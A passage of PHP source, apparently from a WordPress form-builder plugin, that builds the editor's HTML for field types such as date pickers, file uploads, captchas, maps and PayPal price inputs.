              $rep ='<div id="wdform_field'.$id.'" type="type_time" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_time" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><div id="'.$id.'_table_time" style="display: table;"><div id="'.$id.'_tr_time1" style="display: table-row;"><div id="'.$id.'_td_time_input1" style="width: 32px; display: table-cell;"><input type="text" value="'.$param['w_hh'].'" class="time_box" id="'.$id.'_hhform_id_temp" name="'.$id.'_hhform_id_temp" onkeypress="return check_hour(event, &quot;'.$id.'_hhform_id_temp&quot;, &quot;23&quot;)" onkeyup="change_hour(event, &quot;'.$id.'_hhform_id_temp&quot;,&quot;23&quot;)" onblur="add_0(&quot;'.$id.'_hhform_id_temp&quot;)" '.$param['attributes'].' disabled/></div><div align="center" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></div><div id="'.$id.'_td_time_input2" style="width: 32px; display: table-cell;"><input type="text" value="'.$param['w_mm'].'" class="time_box" id="'.$id.'_mmform_id_temp" name="'.$id.'_mmform_id_temp" onkeypress="return check_minute(event, &quot;'.$id.'_mmform_id_temp&quot;)" onkeyup="change_minute(event, &quot;'.$id.'_mmform_id_temp&quot;)" onblur="add_0(&quot;'.$id.'_mmform_id_temp&quot;)" '.$param['attributes'].' disabled/></div>'.$w_sec.$w_time_type.'</div><div id="'.$id.'_tr_time2" style="display: table-row;"><div id="'.$id.'_td_time_label1" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_hh">'.$w_mini_labels[0].'</label></div><div style="display: table-cell;"></div><div id="'.$id.'_td_time_label2" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_mm">'.$w_mini_labels[1].'</label></div>'.$w_sec_label.$w_time_type_label.'</div></div></div></div>';
              
              break;
            }
            case 'type_date':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_date','w_required','w_class','w_format','w_but_val');
              $temp = $params;
			  if(strpos($temp, 'w_disable_past_days') > -1)
				$params_names = array('w_field_label_size','w_field_label_pos','w_date','w_required','w_class','w_format','w_but_val', 'w_disable_past_days');
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $param['w_disable_past_days'] = isset($param['w_disable_past_days']) ? $param['w_disable_past_days'] : 'no';
			  $disable_past_days = $param['w_disable_past_days'] == 'yes' ? 'true' : 'false';

              $rep ='<div id="wdform_field'.$id.'" type="type_date" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_date" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_disable_past_days'].'" name="'.$id.'_dis_past_daysform_id_temp" id="'.$id.'_dis_past_daysform_id_temp"><input type="text" value="'.$param['w_date'].'" class="wdform-date" id="'.$id.'_elementform_id_temp" name="'.$id.'_elementform_id_temp" maxlength="10" size="10" onchange="change_value(&quot;'.$id.'_elementform_id_temp&quot;)" '.$param['attributes'].' disabled/><input id="'.$id.'_buttonform_id_temp" class="button" type="reset" value="'.$param['w_but_val'].'" format="'.$param['w_format'].'" src="templates/bluestork/images/system/calendar.png?ver='. get_option("wd_form_maker_version").'" alt="calendario" '.$param['attributes'].' onclick="return showCalendar(&quot;'.$id.'_elementform_id_temp&quot; , &quot;'.$param['w_format'].'&quot;, '.$disable_past_days.')"></div></div>';
              
              break;
            }
            case 'type_date_fields':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_day','w_month','w_year','w_day_type','w_month_type','w_year_type','w_day_label','w_month_label','w_year_label','w_day_size','w_month_size','w_year_size','w_required','w_class','w_from','w_to','w_divider');
              
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
            
      
              if($param['w_day_type']=="SELECT")
              {

              
                $w_day_type = '<select id="'.$id.'_dayform_id_temp" name="'.$id.'_dayform_id_temp" onchange="set_select(this)" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].' disabled><option value=""></option>';
                for($k=0; $k<=31; $k++)
                {
                  if($k<10)
                  {
                    if($param['w_day']=='0'.$k)
                    $selected = "selected=\"selected\"";
                    else
                    $selected = "";
                    
                    $w_day_type .= '<option value="0'.$k.'" '.$selected.'>0'.$k.'</option>';
                  }
                  else
                  {
                  if($param['w_day']==''.$k)
                    $selected = "selected=\"selected\"";
                    else
                    $selected = "";
                    
                    $w_day_type .= '<option value="'.$k.'" '.$selected.'>'.$k.'</option>';
                  }
                  
                  
                  
                }
                $w_day_type .= '</select>';
              }
              else
					{
						$w_day_type = '<input type="text" value="'.$param['w_day'].'" id="'.$id.'_dayform_id_temp" name="'.$id.'_dayform_id_temp" onchange="change_value(&quot;'.$id.'_dayform_id_temp&quot;)" onkeypress="return check_day(event, &quot;'.$id.'_dayform_id_temp&quot;)" onblur="if (this.value==&quot;0&quot;) this.value=&quot;&quot;; else add_0(&quot;'.$id.'_dayform_id_temp&quot;)" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].' disabled/>';
					}

					if($param['w_month_type']=="SELECT")
					{
					
						$w_month_type = '<select id="'.$id.'_monthform_id_temp" name="'.$id.'_monthform_id_temp" onchange="set_select(this)" style="width: '.$param['w_month_size'].'px;" '.$param['attributes'].' disabled><option value=""></option><option value="01" '.($param['w_month']=="01" ? "selected=\"selected\"": "").'  ><!--repstart-->January<!--repend--></option><option value="02" '.($param['w_month']=="02" ? "selected=\"selected\"": "").'><!--repstart-->February<!--repend--></option><option value="03" '.($param['w_month']=="03"? "selected=\"selected\"": "").'><!--repstart-->March<!--repend--></option><option value="04" '.($param['w_month']=="04" ? "selected=\"selected\"": "").' ><!--repstart-->April<!--repend--></option><option value="05" '.($param['w_month']=="05" ? "selected=\"selected\"": "").' ><!--repstart-->May<!--repend--></option><option value="06" '.($param['w_month']=="06" ? "selected=\"selected\"": "").' ><!--repstart-->June<!--repend--></option><option value="07" '.($param['w_month']=="07" ? "selected=\"selected\"": "").' ><!--repstart-->July<!--repend--></option><option value="08" '.($param['w_month']=="08" ? "selected=\"selected\"": "").' ><!--repstart-->August<!--repend--></option><option value="09" '.($param['w_month']=="09" ? "selected=\"selected\"": "").' ><!--repstart-->September<!--repend--></option><option value="10" '.($param['w_month']=="10" ? "selected=\"selected\"": "").' ><!--repstart-->October<!--repend--></option><option value="11" '.($param['w_month']=="11" ? "selected=\"selected\"": "").'><!--repstart-->November<!--repend--></option><option value="12" '.($param['w_month']=="12" ? "selected=\"selected\"": "").' ><!--repstart-->December<!--repend--></option></select>';
					
					}
					else
					{
					$w_month_type = '<input type="text" value="'.$param['w_month'].'" id="'.$id.'_monthform_id_temp" name="'.$id.'_monthform_id_temp" onkeypress="return check_month(event, &quot;'.$id.'_monthform_id_temp&quot;)" onchange="change_value(&quot;'.$id.'_monthform_id_temp&quot;)" onblur="if (this.value==&quot;0&quot;) this.value=&quot;&quot;; else add_0(&quot;'.$id.'_monthform_id_temp&quot;)" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].' disabled/>';
					
					}

					if($param['w_year_type']=="SELECT")
					{
						$w_year_type = '<select id="'.$id.'_yearform_id_temp" name="'.$id.'_yearform_id_temp" onchange="set_select(this)" from="'.$param['w_from'].'" to="'.$param['w_to'].'" style="width: '.$param['w_year_size'].'px;" '.$param['attributes'].' disabled><option value=""></option>';
                for($k=$param['w_to']; $k>=$param['w_from']; $k--)
                {
                  if($param['w_year']==$k)
                  $selected = "selected=\"selected\"";
                  else
                  $selected = "";
                  
                  $w_year_type .= '<option value="'.$k.'" '.$selected.'>'.$k.'</option>';
                }
                $w_year_type .= '</select>';
              
              }
              else
              {
                $w_year_type = '<input type="text" value="'.$param['w_year'].'" id="'.$id.'_yearform_id_temp" name="'.$id.'_yearform_id_temp" onchange="change_year(&quot;'.$id.'_yearform_id_temp&quot;)" onkeypress="return check_year1(event, &quot;'.$id.'_yearform_id_temp&quot;)" onblur="check_year2(&quot;'.$id.'_yearform_id_temp&quot;)" from="'.$param['w_from'].'" to="'.$param['w_to'].'" style="width: '.$param['w_day_size'].'px;" '.$param['attributes'].' disabled/>';
              }

              
              $rep ='<div id="wdform_field'.$id.'" type="type_date_fields" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_date_fields" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><div id="'.$id.'_table_date" style="display: table;"><div id="'.$id.'_tr_date1" style="display: table-row;"><div id="'.$id.'_td_date_input1" style="display: table-cell;">
              '.$w_day_type.'
              
              </div><div id="'.$id.'_td_date_separator1" style="display: table-cell;"><span id="'.$id.'_separator1" class="wdform_separator">'.$param['w_divider'].'</span></div><div id="'.$id.'_td_date_input2" style="display: table-cell;">'.$w_month_type.'</div><div id="'.$id.'_td_date_separator2" style="display: table-cell;"><span id="'.$id.'_separator2" class="wdform_separator">'.$param['w_divider'].'</span></div><div id="'.$id.'_td_date_input3" style="display: table-cell;">'.$w_year_type.'</div></div><div id="'.$id.'_tr_date2" style="display: table-row;"><div id="'.$id.'_td_date_label1" style="display: table-cell;"><label class="mini_label" id="'.$id.'_day_label">'.$param['w_day_label'].'</label></div><div style="display: table-cell;"></div><div id="'.$id.'_td_date_label2" style="display: table-cell;"><label class="mini_label" id="'.$id.'_month_label">'.$param['w_month_label'].'</label></div><div style="display: table-cell;"></div><div id="'.$id.'_td_date_label3" style="display: table-cell;"><label class="mini_label" id="'.$id.'_year_label">'.$param['w_year_label'].'</label></div></div></div></div></div>';
              
              break;
            }
            case 'type_file_upload':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_destination','w_extension','w_max_size','w_required','w_multiple','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                if (isset($temp[1])) {
                  $temp = $temp[1];
                }
                else {
                  $temp = '';
                }
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $multiple = ($param['w_multiple']=="yes" ? "multiple='multiple'" : "");	

              $rep ='<div id="wdform_field'.$id.'" type="type_file_upload" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required" style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_file_upload" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="***max_sizeskizb'.$id.'***'.$param['w_max_size'].'***max_sizeverj'.$id.'***" id="'.$id.'_max_size" name="'.$id.'_max_size"><input type="hidden" value="***destinationskizb'.$id.'***'.$param['w_destination'].'***destinationverj'.$id.'***" id="'.$id.'_destination" name="'.$id.'_destination"><input type="hidden" value="***extensionskizb'.$id.'***'.$param['w_extension'].'***extensionverj'.$id.'***" id="'.$id.'_extension" name="'.$id.'_extension"><input type="file" class="file_upload" id="'.$id.'_elementform_id_temp" name="'.$id.'_fileform_id_temp"  '.$multiple.' '.$param['attributes'].' disabled/></div></div>';
              
              break;
            }
            case 'type_captcha':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_digit','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              
              $rep ='<div id="wdform_field'.$id.'" type="type_captcha" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display:'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_captcha" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><div style="display: table;"><div style="display: table-row;"><div valign="middle" style="display: table-cell;"><img type="captcha" digit="'.$param['w_digit'].'" src="' . add_query_arg(array('action' => 'formcontactwdcaptcha', 'digit' => $param['w_digit'], 'i' => 'form_id_temp'), admin_url('admin-ajax.php')) . '" id="_wd_captchaform_id_temp" class="captcha_img" onclick="captcha_refresh(&quot;_wd_captcha&quot;,&quot;form_id_temp&quot;)" '.$param['attributes'].'></div><div valign="middle" style="display: table-cell;"><div class="captcha_refresh" id="_element_refreshform_id_temp" onclick="captcha_refresh(&quot;_wd_captcha&quot;,&quot;form_id_temp&quot;)" '.$param['attributes'].'></div></div></div><div style="display: table-row;"><div style="display: table-cell;"><input type="text" class="captcha_input" id="_wd_captcha_inputform_id_temp" name="captcha_input" style="width: '.($param['w_digit']*10+15).'px;" '.$param['attributes'].' disabled/></div></div></div></div></div>';
              
              break;
            }
			case 'type_arithmetic_captcha':
            {
              $params_names=array('w_field_label_size','w_field_label_pos', 'w_count', 'w_operations','w_class', 'w_input_size');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
			 
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
			  $param['w_count'] = $param['w_count'] ? $param['w_count'] : 1;
              $param['w_operations'] = $param['w_operations'] ? $param['w_operations'] : '+, -, *, /';
              $param['w_input_size'] = $param['w_input_size'] ? $param['w_input_size'] : 60;
              
              $rep ='<div id="wdform_field'.$id.'" type="type_arithmetic_captcha" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display:'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_captcha" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><div style="display: table;"><div style="display: table-row;"><div style="display: table-cell;"><img type="captcha" operations_count="'.$param['w_count'].'" operations="'.$param['w_operations'].'" input_size="'.$param['w_input_size'].'" src="' . add_query_arg(array('action' => 'formcontactwdmathcaptcha', 'operations_count' => $param['w_count'], 'operations' => $param['w_operations'], 'i' => 'form_id_temp'), admin_url('admin-ajax.php')) . '" id="_wd_arithmetic_captchaform_id_temp" class="arithmetic_captcha_img" onclick="captcha_refresh(&quot;_wd_arithmetic_captcha&quot;,&quot;form_id_temp&quot;)" '.$param['attributes'].'></div><div style="display: table-cell;"><input type="text" class="arithmetic_captcha_input" id="_wd_arithmetic_captcha_inputform_id_temp" name="arithmetic_captcha_input" onkeypress="return check_isnum(event)" style="width: '.$param['w_input_size'].'px;" '.$param['attributes'].' disabled/></div><div style="display: table-cell; vertical-align: middle;"><div class="captcha_refresh" id="_element_refreshform_id_temp" onclick="captcha_refresh(&quot;_wd_arithmetic_captcha&quot;,&quot;form_id_temp&quot;)" '.$param['attributes'].'></div></div></div></div></div></div>';
              
              break;
            }


            case 'type_recaptcha':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_public','w_private','w_theme','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              
              $rep ='<div id="wdform_field'.$id.'" type="type_recaptcha" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_recaptcha" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><div id="wd_recaptchaform_id_temp" public_key="'.$param['w_public'].'" private_key="'.$param['w_private'].'" theme="'.$param['w_theme'].'" '.$param['attributes'].'><span style="color: red; font-style: italic;">Recaptcha doesn\'t display in back end</span></div></div></div>';
              
              break;
            }
            
            case 'type_hidden':
            {
              $params_names=array('w_name','w_value');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              $param['w_name'] = str_replace('&nbsp;','',$param['w_name']);
              $rep ='<div id="wdform_field'.$id.'" type="type_hidden" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" style="display: table-cell;"><span id="'.$id.'_element_labelform_id_temp" style="display: none;">'.$param['w_name'].'</span><span style="color: red; font-size: 13px;">Hidden field</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" style="display: table-cell; padding-left:7px;"><input type="hidden" value="'.$param['w_value'].'" id="'.$id.'_elementform_id_temp" name="'.$param['w_name'].'" '.$param['attributes'].'><input type="hidden" value="type_hidden" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><div><span align="left">Name: </span><span align="left" id="'.$id.'_hidden_nameform_id_temp">'.$param['w_name'].'</span></div><div><span align="left">Value: </span><span align="left" id="'.$id.'_hidden_valueform_id_temp">'.$param['w_value'].'</span></div></div></div>';
              
              break;
            }
            case 'type_mark_map':
            {
              $params_names=array('w_field_label_size','w_field_label_pos','w_center_x','w_center_y','w_long','w_lat','w_zoom','w_width','w_height','w_info','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
            
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
            
              $rep ='<div id="wdform_field'.$id.'" type="type_mark_map" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_mark_map" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><div id="'.$id.'_elementform_id_temp" long0="'.$param['w_long'].'" lat0="'.$param['w_lat'].'" zoom="'.$param['w_zoom'].'" info0="'.$param['w_info'].'" center_x="'.$param['w_center_x'].'" center_y="'.$param['w_center_y'].'" style="width: '.$param['w_width'].'px; height: '.$param['w_height'].'px;" '.$param['attributes'].'></div></div></div>	';
              
              break;
            }
            
            case 'type_map':
            {
              $params_names=array('w_center_x','w_center_y','w_long','w_lat','w_zoom','w_width','w_height','w_info','w_class');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }
              
              $marker='';
              
              $param['w_long']	= explode('***',$param['w_long']);
              $param['w_lat']	= explode('***',$param['w_lat']);
              $param['w_info']	= explode('***',$param['w_info']);
              foreach($param['w_long'] as $key => $w_long )
              {
                $marker.='long'.$key.'="'.$w_long.'" lat'.$key.'="'.$param['w_lat'][$key].'" info'.$key.'="'.$param['w_info'][$key].'"';
              }
            
              $rep ='<div id="wdform_field'.$id.'" type="type_map" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: table-cell;"><span id="'.$id.'_element_labelform_id_temp" style="display: none;">'.$label.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: table-cell;"><input type="hidden" value="type_map" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><div id="'.$id.'_elementform_id_temp" zoom="'.$param['w_zoom'].'" center_x="'.$param['w_center_x'].'" center_y="'.$param['w_center_y'].'" style="width: '.$param['w_width'].'px; height: '.$param['w_height'].'px;" '.$marker.' '.$param['attributes'].'></div></div></div>';
              
              break;
            }
            case 'type_paypal_price':
            {
                        
              $params_names=array('w_field_label_size','w_field_label_pos','w_first_val','w_title', 'w_mini_labels','w_size','w_required','w_hide_cents','w_class','w_range_min','w_range_max');
              $temp=$params;
              foreach($params_names as $params_name )
              {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }

              if($temp)
              {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' add_'.$attr;
              }

              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "table-cell" : "block");	
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required_sym = ($param['w_required']=="yes" ? " *" : "");	
              $hide_cents = ($param['w_hide_cents']=="yes" ? "none;" : "table-cell;");	
            

              $w_first_val = explode('***',$param['w_first_val']);
              $w_title = explode('***',$param['w_title']);
              $w_mini_labels = explode('***',$param['w_mini_labels']);
              
              $rep ='<div id="wdform_field'.$id.'" type="type_paypal_price" class="wdform_field" style="display: table-cell;">'.$arrows.'<div align="left" id="'.$id.'_label_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span id="'.$id.'_element_labelform_id_temp" class="label" style="vertical-align: top;">'.$label.'</span><span id="'.$id.'_required_elementform_id_temp" class="required"style="vertical-align: top;">'.$required_sym.'</span></div><div align="left" id="'.$id.'_element_sectionform_id_temp" class="'.$param['w_class'].'" style="display: '.$param['w_field_label_pos'].';"><input type="hidden" value="type_paypal_price" name="'.$id.'_typeform_id_temp" id="'.$id.'_typeform_id_temp"><input type="hidden" value="'.$param['w_required'].'" name="'.$id.'_requiredform_id_temp" id="'.$id.'_requiredform_id_temp"><input type="hidden" value="'.$param['w_range_min'].'" name="'.$id.'_range_minform_id_temp" id="'.$id.'_range_minform_id_temp"><input type="hidden" value="'.$param['w_range_max'].'" name="'.$id.'_range_maxform_id_temp" id="'.$id.'_range_maxform_id_temp"><div id="'.$id.'_table_price" style="display: table;"><div id="'.$id.'_tr_price1" style="display: table-row;"><div id="'.$id.'_td_name_currency" style="display: table-cell;"><span class="wdform_colon" style="vertical-align: middle;"><!--repstart-->&nbsp;$&nbsp;<!--repend--></span></div><div id="'.$id.'_td_name_dollars" style="display: table-cell;"><input type="text" class="'.$input_active.'" id="'.$id.'_element_dollarsform_id_temp" name="'.$id.'_element_dollarsform_id_temp" value="'.$w_first_val[0].'" title="'.$w_title[0].'"onfocus="delete_value(&quot;'.$id.'_element_dollarsform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_element_dollarsform_id_temp&quot;)"onchange="change_value(&quot;'.$id.'_element_dollarsform_id_temp&quot;)" onkeypress="return check_isnum(event)" style="width: '.$param['w_size'].'px;" '.$param['attributes'].' disabled/></div><div id="'.$id.'_td_name_divider" style="display: '.$hide_cents.';"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;.&nbsp;</span></div><div id="'.$id.'_td_name_cents" style="display: '.$hide_cents.'"><input type="text" class="'.$input_active.'" id="'.$id.'_element_centsform_id_temp" name="'.$id.'_element_centsform_id_temp" value="'.$w_first_val[1].'" title="'.$w_title[1].'"onfocus="delete_value(&quot;'.$id.'_element_centsform_id_temp&quot;)" onblur="return_value(&quot;'.$id.'_element_centsform_id_temp&quot;); add_0(&quot;'.$id.'_element_centsform_id_temp&quot;)"onchange="change_value(&quot;'.$id.'_element_centsform_id_temp&quot;)" onkeypress="return check_isnum_interval(event,&quot;'.$id.'_element_centsform_id_temp&quot;,0,99)"style="width: 30px;" '.$param['attributes'].' disabled/></div></div><div id="'.$id.'_tr_price2" style="display: table-row;"><div style="display: table-cell;"><label class="mini_label"></label></div><div align="left" style="display: table-cell;"><label class="mini_label" id="'.$id.'_mini_label_dollars">'.$w_mini_labels[0].'</label></div><div id="'.$id.'_td_name_label_divider" style="display: '.$hide_cents.'"><label class="mini_label"></label></div><div align="left" id="'.$id.'_td_name_label_cents" style="display: '.$hide_cents.'"><label class="mini_label" id="'.$id.'_mini_label_cents">'.$w_mini_labels[1].'</label></div></div></div></div></div>';
              break;
            }
            
            case 'type_paypal_select':
            {
            $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_choices','w_choices_price','w_choices_checked', 'w_choices_disabled','w_required','w_quantity', 'w_quantity_value','w_class','w_property','w_property_values');
              $temp=$params;
